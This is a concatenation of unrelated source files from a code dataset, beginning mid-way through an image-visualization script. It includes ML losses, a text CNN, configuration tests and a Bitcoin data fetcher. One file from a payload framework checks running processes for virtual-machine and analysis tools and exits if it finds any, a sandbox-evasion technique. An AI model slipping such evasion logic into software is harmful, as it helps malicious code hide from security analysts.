imwrite(os.path.join(constants.RUNS, 'image_dumps', f'img_{visualize_entropy.save_idx:04d}.jpg'), image_unnormalized)
cur_subplot += 1
plt.subplot(1, num_subplots, cur_subplot)
cm_hot = matplotlib.cm.get_cmap('jet')
imwrite(os.path.join(constants.RUNS, 'image_dumps', f'emap_{suffix}_{visualize_entropy.save_idx:04d}.png'), cm_hot(entropy_map / visualize_entropy.max_entropy))
plt.imshow(entropy_map, norm=norm_ent, cmap='jet')
cur_subplot += 1
if not prediction is None:
prediction_mapped = map_segmentation_to_colors(prediction.astype(np.uint8), 'scannet')
#imwrite(os.path.join(constants.RUNS, 'image_dumps', f'pred_0_{visualize_entropy.save_idx:04d}.png'), cm_hot(prediction))
imwrite(os.path.join(constants.RUNS, 'image_dumps', f'pred_{visualize_entropy.save_idx:04d}.png'), prediction_mapped)
plt.subplot(1, num_subplots, cur_subplot)
cur_subplot += 1
plt.imshow(prediction_mapped)
if not ground_truth is None:
ground_truth = map_segmentation_to_colors(ground_truth.astype(np.uint8), 'scannet')
#imwrite(os.path.join(constants.RUNS, 'image_dumps', f'pred_0_{visualize_entropy.save_idx:04d}.png'), cm_hot(prediction))
imwrite(os.path.join(constants.RUNS, 'image_dumps', f'gt_{visualize_entropy.save_idx:04d}.png'), ground_truth)
plt.subplot(1, num_subplots, cur_subplot)
cur_subplot += 1
plt.imshow(ground_truth)
if not valid_mask is None:
plt.subplot(1, num_subplots, cur_subplot)
cur_subplot += 1
plt.imshow(valid_mask)
if not weight_map is None:
plt.subplot(1, num_subplots, cur_subplot)
cur_subplot += 1
plt.imshow(weight_map, norm=norm_weight, cmap='jet')
plt.tight_layout()
if save:
plt.savefig(os.path.join(constants.RUNS, 'image_dumps', f'{visualize_entropy.save_idx:04d}_{suffix}.jpg'), bbox_inches='tight')
visualize_entropy.save_idx += 1
plt.close()
else:
plt.show(block=not save)
visualize_entropy.save_idx = 0
visualize_entropy.max_weight = 1
visualize_entropy.max_entropy = np.log2(40 / 2)
def visualize_vote_view_entropy(lmdb_handle, base_size, paths, indices_to_dataset, vote_entropy_scores, view_entropy_scores, scores):
from dataloader.paths import PathsDataset
dataset = PathsDataset(lmdb_handle, base_size, paths)
for i, j in zip(indices_to_dataset, range(len(indices_to_dataset))):
import matplotlib
import matplotlib.pyplot as plt
image_unnormalized = ((np.transpose(dataset[i]['image'].numpy(), axes=[1, 2, 0]) *
(0.229, 0.224, 0.225) + (0.485, 0.456, 0.406)) * 255).astype(np.uint8)
plt.figure()
plt.title('display')
plt.subplot(1, 4, 1)
plt.imshow(image_unnormalized)
plt.subplot(1, 4, 2)
norm_ent = matplotlib.colors.Normalize(vmin=0, vmax=visualize_entropy.max_entropy, clip=False)
plt.imshow(vote_entropy_scores[j, :, :], norm=norm_ent, cmap='jet')
plt.subplot(1, 4, 3)
plt.imshow(view_entropy_scores[j, :, :], norm=norm_ent, cmap='jet')
plt.subplot(1, 4, 4)
norm = matplotlib.colors.Normalize(vmin=np.min(scores[j]), vmax=np.max(scores[j]), clip=False)
plt.imshow(scores[j], norm=norm, cmap='jet')
plt.savefig(os.path.join(constants.RUNS, 'image_dumps', f'ent_{visualize_entropy.save_idx:04d}.png'), bbox_inches='tight')
visualize_entropy.save_idx += 1
plt.close()
plt.show(block=False)
def mark_boundaries(image_0, image_1, color):
from scipy import ndimage
boundary_mask = np.ones_like(image_1)
for i in range(image_1.shape[0] - 1):
for j in range(image_1.shape[1] - 1):
if (image_1[i, j] != image_1[i, j + 1] or image_1[i, j] != image_1[i + 1, j]):
boundary_mask[i, j] = 0
boundary_mask = ndimage.binary_erosion(boundary_mask, structure=np.ones((2, 2))).astype(boundary_mask.dtype)
image_0[boundary_mask == 0, :] = color
return image_0
def visualize_spx_dataset(dataset_name, dataset):
import matplotlib.pyplot as plt
from tqdm import tqdm
from dataloader.indoor_scenes import IndoorScenesWithAllInfo
dataset.image_path_subset = sorted(dataset.image_path_subset)
spx_dataset = IndoorScenesWithAllInfo(dataset_name, dataset.lmdb_handle, "superpixel", (240, 320), dataset.image_path_subset)
for i in tqdm(range(len(dataset)), desc='Visualization'):
plt.figure(figsize=(16,8))
plt.title('spx')
plt.subplot(1, 2, 1)
image_unnormalized = ((np.transpose(dataset[i]['image'].numpy(), axes=[1, 2, 0]) * (0.229, 0.224, 0.225) + (0.485, 0.456, 0.406)) * 255)
image_unnormalized[dataset[i]['label'].numpy()==255, :] *= 0.5
image_unnormalized = image_unnormalized.astype(np.uint8)
image_unnormalized = mark_boundaries(image_unnormalized, spx_dataset[spx_dataset.image_path_subset.index(dataset.image_path_subset[i])]['superpixel'])
plt.imshow(image_unnormalized)
plt.subplot(1, 2, 2)
prediction_mapped = map_segmentation_to_colors(dataset[i]['label'].numpy().astype(np.uint8), dataset_name)
prediction_mapped = mark_boundaries(prediction_mapped, spx_dataset[spx_dataset.image_path_subset.index(dataset.image_path_subset[i])]['superpixel'])
plt.imshow(prediction_mapped)
plt.savefig(os.path.join(constants.RUNS, 'image_dumps', f'sel_{i:04d}.png'), bbox_inches='tight')
plt.close()
def visualize_numbered_superpixels(dataset_name, dataset):
import matplotlib.pyplot as plt
from tqdm import tqdm
from dataloader.indoor_scenes import IndoorScenesWithAllInfo
spx_dataset = IndoorScenesWithAllInfo(dataset_name, dataset.lmdb_handle, "superpixel_40", (240, 320), dataset.image_path_subset)
for i in tqdm(range(len(dataset)), desc='Visualization'):
for j in np.unique(spx_dataset[spx_dataset.image_path_subset.index(dataset.image_path_subset[i])]['superpixel']).tolist():
plt.figure(figsize=(16,8))
plt.title('spx')
plt.subplot(1, 2, 1)
image_unnormalized = ((np.transpose(dataset[i]['image'].numpy(), axes=[1, 2, 0]) * (0.229, 0.224, 0.225) + (0.485, 0.456, 0.406)) * 255).astype(np.uint8)
mask = spx_dataset[spx_dataset.image_path_subset.index(dataset.image_path_subset[i])]['superpixel']!=j
image_unnormalized = mark_boundaries(image_unnormalized, spx_dataset[spx_dataset.image_path_subset.index(dataset.image_path_subset[i])]['superpixel'], [255,255,255])
image_unnormalized[mask, :] = image_unnormalized[mask, :] // 2
plt.imshow(image_unnormalized)
plt.subplot(1, 2, 2)
prediction_mapped = map_segmentation_to_colors(dataset[i]['label'].numpy().astype(np.uint8), dataset_name)
prediction_mapped = mark_boundaries(prediction_mapped, spx_dataset[spx_dataset.image_path_subset.index(dataset.image_path_subset[i])]['superpixel'], [255,255,255])
prediction_mapped[mask, :] = prediction_mapped[mask, :] // 3
plt.imshow(prediction_mapped)
plt.savefig(os.path.join(constants.RUNS, 'image_dumps', f'{i:03d}_{j:03d}.png'), bbox_inches='tight')
plt.close()
def visualize_seedset_spx(dataset_name):
from dataloader import dataset_base
from dataloader.indoor_scenes import IndoorScenes
from torch.utils.data import DataLoader
lmdb_handle = dataset_base.LMDBHandle(os.path.join(constants.HDD_DATASET_ROOT, dataset_name, "dataset.lmdb"), False)
dataset = IndoorScenes(dataset_name, lmdb_handle, (240, 320), 'seedset_0')
paths = [f'scene0014_00_{i:06d}' for i in [1540]]
print(paths)
images = [u'{}'.format(x).encode('ascii') for x in paths]
dataset.image_path_subset = images
#visualize_spx_dataset(dataset_name, dataset)
visualize_numbered_superpixels(dataset_name, dataset)
def visualize_selection_spx(dataset_name, selections_path):
from dataloader import dataset_base
from dataloader.indoor_scenes import IndoorScenes, ActiveIndoorScenesRegional, IndoorScenesWithAllInfo
from torch.utils.data import DataLoader
lmdb_handle = dataset_base.LMDBHandle(os.path.join(constants.HDD_DATASET_ROOT, dataset_name, "dataset.lmdb"), False)
train_set = ActiveIndoorScenesRegional(dataset_name, lmdb_handle, (240, 320), 'seedset_0')
train_set.load_selections(os.path.join(constants.RUNS, dataset_name, selections_path, "selections"))
visualize_spx_dataset(dataset_name, train_set)
def _mark_boundaries(mask, output):
from scipy import ndimage
boundary_mask = np.ones_like(mask)
for i in range(mask.shape[0] - 1):
for j in range(mask.shape[1] - 1):
if (mask[i, j] != mask[i, j + 1] or mask[i, j] != mask[i + 1, j]):
boundary_mask[i, j] = 0
#output[i, j, :] = [0, 0, 0]
boundary_mask = ndimage.binary_erosion(boundary_mask, structure=np.ones((3, 3))).astype(boundary_mask.dtype)
output[boundary_mask == 0, :] = [0, 0, 0]
return output
def visualize_image_target_prediction(filename, image, target, random, random_loss, viewal, viewal_loss, full, full_loss):
from imageio import imwrite
import matplotlib
from PIL import Image
cm_hot = matplotlib.cm.get_cmap('jet')
image_unnormalized = ((np.transpose(image, axes=[1, 2, 0]) * (0.229, 0.224, 0.225) + (0.485, 0.456, 0.406)) * 255)
c0 = 0.60
c1 = 1 - c0
target_mapped = map_segmentation_to_colors(target.astype(np.uint8), 'scannet') * 255
target_mapped = _mark_boundaries(target, (c0 * target_mapped + c1 * image_unnormalized).astype(np.uint8))
random_mapped = map_segmentation_to_colors(random.astype(np.uint8), 'scannet') * 255
random_mapped = _mark_boundaries(random,(c0 * random_mapped + c1 * image_unnormalized).astype(np.uint8))
viewal_mapped = map_segmentation_to_colors(viewal.astype(np.uint8), 'scannet') * 255
viewal_mapped = _mark_boundaries(viewal,(c0 * viewal_mapped + c1 * image_unnormalized).astype(np.uint8))
full_mapped = map_segmentation_to_colors(full.astype(np.uint8), 'scannet') * 255
full_mapped = _mark_boundaries(full,(c0 * full_mapped + c1 * image_unnormalized).astype(np.uint8))
#hstacked = np.hstack((target_mapped, full_mapped, random_mapped, viewal_mapped))
normalizer = max(max(np.max(random_loss), np.max(viewal_loss)), np.max(full_loss)) / 1.5
#imwrite(os.path.join(constants.RUNS, 'image_dumps', f'{filename}.png'), hstacked)
imwrite(os.path.join(constants.RUNS, 'image_dumps', f'{filename}_im.png'), image_unnormalized)
imwrite(os.path.join(constants.RUNS, 'image_dumps', f'{filename}_tgt.png'), target_mapped)
imwrite(os.path.join(constants.RUNS, 'image_dumps', f'{filename}_rnd.png'), random_mapped)
imwrite(os.path.join(constants.RUNS, 'image_dumps', f'{filename}_rnd_loss.png'), cm_hot(random_loss/normalizer))
imwrite(os.path.join(constants.RUNS, 'image_dumps', f'{filename}_val.png'), viewal_mapped)
imwrite(os.path.join(constants.RUNS, 'image_dumps', f'{filename}_val_loss.png'), cm_hot(viewal_loss/normalizer))
imwrite(os.path.join(constants.RUNS, 'image_dumps', f'{filename}_ful.png'), full_mapped)
imwrite(os.path.join(constants.RUNS, 'image_dumps', f'{filename}_ful_loss.png'), cm_hot(full_loss/normalizer))
im_im = Image.open(os.path.join(constants.RUNS, 'image_dumps', f'{filename}_im.png'))
im_tgt = Image.open(os.path.join(constants.RUNS, 'image_dumps', f'{filename}_tgt.png'))
im_rnd = Image.open(os.path.join(constants.RUNS, 'image_dumps', f'{filename}_rnd.png'))
im_val = Image.open(os.path.join(constants.RUNS, 'image_dumps', f'{filename}_val.png'))
im_ful = Image.open(os.path.join(constants.RUNS, 'image_dumps', f'{filename}_ful.png'))
im_rnd_loss = Image.open(os.path.join(constants.RUNS, 'image_dumps', f'{filename}_rnd_loss.png'))
im_val_loss = Image.open(os.path.join(constants.RUNS, 'image_dumps', f'{filename}_val_loss.png'))
im_ful_loss = Image.open(os.path.join(constants.RUNS, 'image_dumps', f'{filename}_ful_loss.png'))
margin_x = 5
margin_y = 5
x = 320
y = 240
final = Image.new('RGB', ((x+margin_x)*4 + 60, (y+margin_y)*2), (255,255,255))
final.paste(im_im, (margin_x//2, margin_y//2))
final.paste(im_rnd_loss, (60+margin_x//2+x+margin_x, margin_y//2))
final.paste(im_val_loss, (60+margin_x//2+(x+margin_x)*2, margin_y//2))
final.paste(im_ful_loss, (60+margin_x//2+(x+margin_x)*3, margin_y//2))
final.paste(im_tgt, (margin_x//2, y+margin_y+margin_y//2))
final.paste(im_rnd, (60+margin_x//2+x+margin_x, y+margin_y+margin_y//2))
final.paste(im_val, (60+margin_x//2+(x+margin_x)*2, y+margin_y+margin_y//2))
final.paste(im_ful, (60+margin_x//2+(x+margin_x)*3, y+margin_y+margin_y//2))
final.save(os.path.join(constants.RUNS, 'image_dumps', f'vis_{filename}.png'))
def visualize_image_target(image, target):
from imageio import imwrite
image_unnormalized = ((np.transpose(image, axes=[1, 2, 0]) * (0.229, 0.224, 0.225) + (0.485, 0.456, 0.406)) * 255).astype(np.uint8)
target_mapped = (map_segmentation_to_colors(target.astype(np.uint8), 'matterport') * 255).astype(np.uint8)
imwrite(os.path.join(constants.RUNS, 'image_dumps', f'{visualize_entropy.save_idx:04d}.png'), np.hstack((image_unnormalized, target_mapped)))
visualize_entropy.save_idx += 1
def visualize_gt(dataset_name):
from dataloader import dataset_base
from dataloader.indoor_scenes import IndoorScenes
from torch.utils.data import DataLoader
import random
lmdb_handle = dataset_base.LMDBHandle(os.path.join(constants.HDD_DATASET_ROOT, dataset_name, "dataset.lmdb"), False)
train_set = IndoorScenes(dataset_name, lmdb_handle, (240, 320), 'train')
ctr = 0
list_of_indices = list(range(len(train_set)))
random.shuffle(list_of_indices)
for i in list_of_indices:
sample = train_set[i]
visualize_image_target(sample['image'].numpy(), sample['label'].numpy())
ctr+=1
if ctr==1000:
break
|
lib/sandbox/python/check_all_process_names.py
|
Azh4rR31gn5/Winpayloads
| 1,382 |
117810
|
<filename>lib/sandbox/python/check_all_process_names.py
#
# Checks all loaded process names, Python
# Module written by <NAME>
# Website: arvanaghi.com
# Twitter: @arvanaghi
# Edited for use in winpayloads
import win32pdh
import sys
EvidenceOfSandbox = []
sandboxProcesses = "vmsrvc", "tcpview", "wireshark", "visual basic", "fiddler", "vmware", "vbox", "process explorer", "autoit", "vboxtray", "vmtools", "vmrawdsk", "vmusbmouse", "vmvss", "vmscsi", "vmxnet", "vmx_svga", "vmmemctl", "df5serv", "vboxservice", "vmhgfs"
_, runningProcesses = win32pdh.EnumObjectItems(None,None,'process', win32pdh.PERF_DETAIL_WIZARD)
for process in runningProcesses:
for sandboxProcess in sandboxProcesses:
if sandboxProcess in str(process):
if process not in EvidenceOfSandbox:
EvidenceOfSandbox.append(process)
break
if not EvidenceOfSandbox:
pass
else:
sys.exit()
|
deep_qa/training/losses.py
|
richarajpal/deep_qa
| 459 |
117812
|
<gh_stars>100-1000
from keras import backend as K
from ..tensors.backend import VERY_NEGATIVE_NUMBER, VERY_LARGE_NUMBER
def ranking_loss(y_pred, y_true):
"""
Using this loss trains the model to give scores to all correct elements in y_true that are
higher than all scores it gives to incorrect elements in y_true.
For example, let ``y_true = [0, 0, 1, 1, 0]``, and let ``y_pred = [-1, 1, 2, 0, -2]``. We will
find the lowest score assigned to correct elements in ``y_true`` (``0`` in this case), and the
highest score assigned to incorrect elements in ``y_true`` (``1`` in this case). We will then
compute a sigmoided loss given these values: ``-K.sigmoid(0 - 1)`` (we're minimizing the loss,
so the negative sign in front of the sigmoid means we want the correct element to have a higher
score than the incorrect element).
Note that the way we do this uses ``K.max()`` and ``K.min()`` over the elements in ``y_true``,
which means that if you have a lot of values in here, you'll only get gradients backpropping
through two of them (the ones on the margin). This could be an inefficient use of your
computation time. Think carefully about the data that you're using with this loss function.
Because of the way masking works with Keras loss functions, also, you need to be sure that any
masked elements in ``y_pred`` have very negative values before they get passed into this loss
function.
"""
correct_elements = y_pred + (1.0 - y_true) * VERY_LARGE_NUMBER
lowest_scoring_correct = K.min(correct_elements, axis=-1)
incorrect_elements = y_pred + y_true * VERY_NEGATIVE_NUMBER
highest_scoring_incorrect = K.max(incorrect_elements, axis=-1)
return K.mean(-K.sigmoid(lowest_scoring_correct - highest_scoring_incorrect))
def ranking_loss_with_margin(y_pred, y_true):
"""
Using this loss trains the model to give scores to all correct elements in y_true that are
higher than all scores it gives to incorrect elements in y_true, plus a margin.
For example, let ``y_true = [0, 0, 1, 1, 0]``, and let ``y_pred = [-1, 1, 2, 0, -2]``. We will
find the lowest score assigned to correct elements in ``y_true`` (``0`` in this case), and the
highest score assigned to incorrect elements in ``y_true`` (``1`` in this case). We will then
compute a hinge loss given these values: ``K.maximum(0.0, 1 + 1 - 0)``.
Note that the way we do this uses ``K.max()`` and ``K.min()`` over the elements in ``y_true``,
which means that if you have a lot of values in here, you'll only get gradients backpropping
through two of them (the ones on the margin). This could be an inefficient use of your
computation time. Think carefully about the data that you're using with this loss function.
Because of the way masking works with Keras loss functions, also, you need to be sure that any
masked elements in ``y_pred`` have very negative values before they get passed into this loss
function.
"""
correct_elements = y_pred + (1.0 - y_true) * VERY_LARGE_NUMBER
lowest_scoring_correct = K.min(correct_elements, axis=-1)
incorrect_elements = y_pred + y_true * VERY_NEGATIVE_NUMBER
highest_scoring_incorrect = K.max(incorrect_elements, axis=-1)
return K.mean(K.maximum(0.0, 1.0 + highest_scoring_incorrect - lowest_scoring_correct))
|
dpwn/models/semantic_cnn.py
|
macdaliot/deep-pwning
| 557 |
117821
|
<filename>dpwn/models/semantic_cnn.py
import tensorflow as tf
import utils.utils as utils
class SemanticCNN:
def __init__(self, config,
sequence_length, vocab_size, embedding_size, num_filters):
self.config = config
self.sequence_length = sequence_length
self.vocab_size = vocab_size
self.embedding_size = embedding_size
self.num_filters = num_filters
if config.get('main', 'seed') == 'None':
self.seed = None
else:
self.seed = config.getint('main', 'seed')
def conv2d(self, data, weight):
return tf.nn.conv2d(data,
weight,
strides=[1, 1, 1, 1],
padding='VALID')
def max_pool(self, data, filter_size):
return tf.nn.max_pool(data,
ksize=[1, self.sequence_length - filter_size + 1, 1, 1],
strides=[1, 1, 1, 1],
padding='VALID')
def variable(self, flavor, shape):
if flavor == 'W_truncated_normal':
return tf.Variable(
tf.truncated_normal(shape,
stddev=0.1,
seed=self.seed,
dtype=tf.float32))
elif flavor == 'W_random_uniform':
return tf.Variable(
tf.random_uniform(shape,
minval=-1.0,
maxval=1.0))
elif flavor == 'b':
return tf.Variable(tf.constant(0.1, shape=shape),
dtype=tf.float32)
else:
return None
def train_input_placeholders(self):
x = tf.placeholder(tf.float32,
shape=[None, self.sequence_length],
name="x")
y_ = tf.placeholder(tf.float32,
[None, self.config.getint('main', 'num_classes')], name="y_")
return x, y_
def model(self, data):
l2_loss = tf.constant(0.0)
keep_prob = tf.placeholder(tf.float32, name="keep_prob")
embed_W = self.variable('W_random_uniform', [self.vocab_size, self.embedding_size])
embedded_words = tf.nn.embedding_lookup(embed_W, tf.cast(data, tf.int32))
embedded_words_expanded = tf.expand_dims(embedded_words, -1)
filter3_shape = [3, self.embedding_size, 1, self.num_filters]
pool_filter3_W = self.variable('W_truncated_normal', filter3_shape)
pool_filter3_b = self.variable('b', [self.num_filters])
conv1 = tf.nn.relu(tf.nn.bias_add(
self.conv2d(embedded_words_expanded, pool_filter3_W), pool_filter3_b))
pool_filter3 = self.max_pool(conv1, 3)
filter4_shape = [4, self.embedding_size, 1, self.num_filters]
pool_filter4_W = self.variable('W_truncated_normal', filter4_shape)
pool_filter4_b = self.variable('b', [self.num_filters])
conv2 = tf.nn.relu(tf.nn.bias_add(
self.conv2d(embedded_words_expanded, pool_filter4_W), pool_filter4_b))
pool_filter4 = self.max_pool(conv2, 4)
filter5_shape = [5, self.embedding_size, 1, self.num_filters]
pool_filter5_W = self.variable('W_truncated_normal', filter5_shape)
pool_filter5_b = self.variable('b', [self.num_filters])
conv3 = tf.nn.relu(tf.nn.bias_add(
self.conv2d(embedded_words_expanded, pool_filter5_W), pool_filter5_b))
pool_filter5 = self.max_pool(conv3, 5)
pool_combined = tf.concat(3, [pool_filter3, pool_filter4, pool_filter5])
pool_final = tf.reshape(pool_combined, [-1, self.num_filters * 3])
dropout = tf.nn.dropout(pool_final, keep_prob)
final_W = tf.get_variable("W", shape=[self.num_filters * 3,
self.config.getint('main', 'num_classes')],
initializer=tf.contrib.layers.xavier_initializer())
final_b = tf.Variable(tf.constant(0.1,
shape=[self.config.getint('main', 'num_classes')]), name="b")
logits = tf.matmul(dropout, final_W) + final_b
y_conv = tf.nn.softmax(logits)
l2_loss += tf.nn.l2_loss(final_W) + tf.nn.l2_loss(final_b)
return y_conv, logits, keep_prob, l2_loss, embedded_words, embed_W
|
tests/test_config.py
|
nikhil153/codecarbon
| 346 |
117822
|
import os
import unittest
from textwrap import dedent
from unittest import mock
from unittest.mock import patch
from codecarbon.core.config import (
clean_env_key,
get_hierarchical_config,
parse_env_config,
parse_gpu_ids,
)
from codecarbon.emissions_tracker import EmissionsTracker
from tests.testutils import get_custom_mock_open
class TestConfig(unittest.TestCase):
def test_clean_env_key(self):
for key in [1, None, 0.2, [], set()]:
with self.assertRaises(AssertionError):
clean_env_key(key)
for (key, target) in [
("", ""),
("USER", "user"),
("CODECARBON_TEST", "test"),
("CODECARBON_TEST_VALUE", "test_value"),
("CODECARBON_TEST_1", "test_1"),
("CODECARBON_1", "1"),
]:
self.assertEqual(clean_env_key(key), target)
def test_parse_gpu_ids(self):
for (ids, target) in [
("0,1,2", [0, 1, 2]),
("[0, 1, 2", [0, 1, 2]),
("(0, 1, 2)", [0, 1, 2]),
("[1]", [1]),
("1", [1]),
("0", [0]),
("", []),
(1, 1),
]:
self.assertEqual(parse_gpu_ids(ids), target)
@mock.patch.dict(
os.environ,
{
"USER": "yes",
"CODECARBON_TEST": "test-VALUE",
"CODECARBON_TEST_KEY": "this_other_value",
},
)
def test_parse_env_config(self):
self.assertDictEqual(
parse_env_config(),
{"codecarbon": {"test": "test-VALUE", "test_key": "this_other_value"}},
)
def test_read_confs(self):
global_conf = dedent(
"""\
[codecarbon]
no_overwrite=path/to/somewhere
local_overwrite=ERROR:not overwritten
syntax_test_key= no/space= problem2
"""
)
local_conf = dedent(
"""\
[codecarbon]
local_overwrite=SUCCESS:overwritten
local_new_key=cool value
"""
)
with patch(
"builtins.open", new_callable=get_custom_mock_open(global_conf, local_conf)
):
conf = dict(get_hierarchical_config())
target = {
"no_overwrite": "path/to/somewhere",
"local_overwrite": "SUCCESS:overwritten",
"syntax_test_key": "no/space= problem2",
"local_new_key": "cool value",
}
self.assertDictEqual(conf, target)
@mock.patch.dict(
os.environ,
{
"USER": "useless key",
"CODECARBON_ENV_OVERWRITE": "SUCCESS:overwritten",
"CODECARBON_ENV_NEW_KEY": "cool value",
},
)
def test_read_confs_and_parse_envs(self):
global_conf = dedent(
"""\
[codecarbon]
no_overwrite=path/to/somewhere
local_overwrite=ERROR:not overwritten
syntax_test_key= no/space= problem2
env_overwrite=ERROR:not overwritten
"""
)
local_conf = dedent(
"""\
[codecarbon]
local_overwrite=SUCCESS:overwritten
local_new_key=cool value
env_overwrite=ERROR:not overwritten
"""
)
with patch(
"builtins.open", new_callable=get_custom_mock_open(global_conf, local_conf)
):
conf = dict(get_hierarchical_config())
target = {
"no_overwrite": "path/to/somewhere",
"local_overwrite": "SUCCESS:overwritten",
"env_overwrite": "SUCCESS:overwritten",
"syntax_test_key": "no/space= problem2",
"local_new_key": "cool value",
"env_new_key": "cool value",
}
self.assertDictEqual(conf, target)
def test_empty_conf(self):
global_conf = ""
local_conf = ""
with patch(
"builtins.open", new_callable=get_custom_mock_open(global_conf, local_conf)
):
conf = dict(get_hierarchical_config())
target = {}
self.assertDictEqual(conf, target)
@mock.patch.dict(
os.environ,
{
"CODECARBON_SAVE_TO_FILE": "true",
"CODECARBON_GPU_IDS": "0, 1",
"CODECARBON_PROJECT_NAME": "ERROR:not overwritten",
},
)
def test_full_hierarchy(self):
global_conf = dedent(
"""\
[codecarbon]
measure_power_secs=10
output_dir=ERROR:not overwritten
save_to_file=ERROR:not overwritten
"""
)
local_conf = dedent(
"""\
[codecarbon]
output_dir=/success/overwritten
emissions_endpoint=http://testhost:2000
gpu_ids=ERROR:not overwritten
"""
)
with patch(
"builtins.open", new_callable=get_custom_mock_open(global_conf, local_conf)
):
tracker = EmissionsTracker(
project_name="test-project", co2_signal_api_token="signal-token"
)
self.assertEqual(tracker._measure_power_secs, 10)
self.assertEqual(tracker._output_dir, "/success/overwritten")
self.assertEqual(tracker._emissions_endpoint, "http://testhost:2000")
self.assertEqual(tracker._gpu_ids, [0, 1])
self.assertEqual(tracker._co2_signal_api_token, "signal-token")
self.assertEqual(tracker._project_name, "test-project")
self.assertTrue(tracker._save_to_file)
|
tests/bitcoin/gen_test_inputs.py
|
febuiles/two1-python
| 415 |
117867
|
import json
import os
import random
import requests
import sys
import time
CHAIN_API_KEY = os.environ.get('CHAIN_API_KEY', None)
CHAIN_API_SECRET = os.environ.get('CHAIN_API_SECRET', None)
def get_from_chain(url_adder):
url = 'https://api.chain.com/v2/bitcoin/%s' % (url_adder)
ok = False
while not ok:
try:
r = requests.get(url, auth=(CHAIN_API_KEY, CHAIN_API_SECRET))
r.raise_for_status()
ok = True
except requests.HTTPError as e:
if r.status_code == 429: # Too many requests
time.sleep(1)
else:
print("Request was to %s" % (url))
raise e
b = json.loads(r.text)
return b
def get_block(block):
''' block can be: a hash, index or "latest" '''
return get_from_chain("blocks/%s" % (block))
def get_txn(tx):
tx_json = _get_txn(tx)
raw_txn = _get_txn(tx_json['hash'], True)
tx_json['hex'] = raw_txn['hex']
return tx_json
def _get_txn(tx, raw=False):
url_adder = "transactions/%s" % (tx)
if raw:
url_adder += '/hex'
return get_from_chain(url_adder)
if __name__ == "__main__":
last_block_index = get_block("latest")['height']
print("last_block_index = %d" % (last_block_index))
num_txns = 2500
full_blocks = 50
block_indices = [random.randrange(0, last_block_index) for i in range(num_txns)]
txns = []
special_txns = ["52759f4ed9bf231014f040c7d0329e783aaa93cf973136d131b0cd55b9bf45cf",
"39409570293e8ec38970b0da814cbb826e75501036ac2f42836859b3ac8120ea",
"a258709e0f21a2cfdf053c3ee08b547dee1574179fbb964b37a43c7cd37c5f74"]
for tx_hash in special_txns:
tx = get_txn(tx_hash)
txns.append(tx)
blocks = []
blocks_grabbed = 0
for bi in block_indices:
b = get_block(bi)
if blocks_grabbed < full_blocks:
blocks.append(b)
# Grab all the txns in this block
for t, txn_hash in enumerate(b['transaction_hashes']):
sys.stdout.write("\rGrabbing txn #%d/%d for block %d (%d/%d) ..." %
(t, len(b['transaction_hashes']), bi, blocks_grabbed + 1, full_blocks))
txns.append(get_txn(txn_hash))
blocks_grabbed += 1
# Dump the file along the way
with open("blocks.json", 'w') as f:
json.dump(blocks, f)
else:
got_tx = False
while not got_tx:
try:
tx_num = random.randrange(0, len(b['transaction_hashes']))
tx = get_txn(b['transaction_hashes'][tx_num])
tx['block_version'] = b['version']
txns.append(tx)
got_tx = True
except:
pass
print("\rblock = %d (version: %d), used txn %d" % (bi, b['version'], tx_num))
with open("txns.json", 'w') as f:
json.dump(txns, f)
|
HybridHaskellPythonCorefAnaphoraResolution/python_coreference_anaphora_resolution_server/test_client.py
|
vojkog/haskell_tutorial_cookbook_examples
| 170 |
117874
|
from __future__ import print_function
from urllib.request import Request, urlopen
import urllib
base_uri = 'http://127.0.0.1:8000?text='
def coref(text, no_detail=False):
def get_raw_data_from_web(a_uri):
req = Request(a_uri, headers={'User-Agent': 'PythonBook/1.0'})
http_response = urlopen(req)
data = http_response.read()
return data
encoded_text = urllib.parse.quote(text, safe='')
if no_detail:
z = '&no_detail=1'
else:
z = ''
raw_data = get_raw_data_from_web(base_uri + encoded_text + z)
return raw_data.decode("UTF8")
print(coref('My sister has a dog named Sam. She loves him'))
print(coref('My sister has a dog named Sam. She loves him', no_detail=True))
|
BERT_pairwise_text_classification/model/data.py
|
rheehot/nlp_implementation
| 181 |
117885
|
import pandas as pd
import torch
from torch.utils.data import Dataset
from typing import Tuple, List, Callable
class Corpus(Dataset):
"""Corpus class"""
def __init__(self, filepath: str, transform_fn: Callable[[str], List[int]]) -> None:
"""Instantiating Corpus class
Args:
filepath (str): filepath
transform_fn (Callable): a function that can act as a transformer
"""
self._corpus = pd.read_csv(filepath, sep='\t')
self._transform = transform_fn
def __len__(self) -> int:
return len(self._corpus)
def __getitem__(self, idx: int) -> Tuple[torch.Tensor, torch.Tensor]:
q1, q2, is_duplicate = self._corpus.iloc[idx].tolist()
list_of_indices, list_of_token_types = [torch.tensor(elm) for elm in self._transform(q1, q2)]
label = torch.tensor(is_duplicate)
return list_of_indices, list_of_token_types, label
|
tools/perf/contrib/vr_benchmarks/shared_android_vr_page_state.py
|
zipated/src
| 2,151 |
117977
|
# Copyright 2017 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
from core import path_util
from devil.android.sdk import intent # pylint: disable=import-error
path_util.AddAndroidPylibToPath()
from pylib.utils import shared_preference_utils
from telemetry.core import android_platform
from telemetry.core import platform
from telemetry.core import util
from telemetry.internal.platform import android_device
from telemetry.page import shared_page_state
CARDBOARD_PATH = os.path.join('chrome', 'android', 'shared_preference_files',
'test', 'vr_cardboard_skipdon_setupcomplete.json')
FAKE_TRACKER_COMPONENT = ('com.google.vr.vrcore/'
'.tracking.HeadTrackingService')
SUPPORTED_POSE_TRACKER_MODES = [
'frozen', # Static pose looking straight forward.
'sweep', # Moves head back and forth horizontally.
'rotate', # Moves head continuously in a circle.
'circle_strafe', # Moves head continuously in a circle (also changes
# position if 6DoF supported?).
'motion_sickness', # Moves head in a sort of figure-eight pattern.
]
SUPPORTED_POSE_TRACKER_TYPES = [
'sensor', # Standard sensor-fusion-based pose tracker.
'tango', # Tango-based pose tracker.
'platform', # ?
'fake', # Fake pose tracker that can provide pre-defined pose sets.
]
class SharedAndroidVrPageState(shared_page_state.SharedPageState):
"""SharedPageState for VR Telemetry tests.
Performs the same functionality as SharedPageState, but with three main
differences:
1. It is currently restricted to Android
2. It performs VR-specific setup such as installing and configuring
additional APKs that are necessary for testing
3. It cycles the screen off then on before each story, similar to how
AndroidScreenRestorationSharedState ensures that the screen is on. See
_CycleScreen() for an explanation on the reasoning behind this.
"""
def __init__(self, test, finder_options, story_set):
# TODO(bsheedy): See about making this a cross-platform SharedVrPageState -
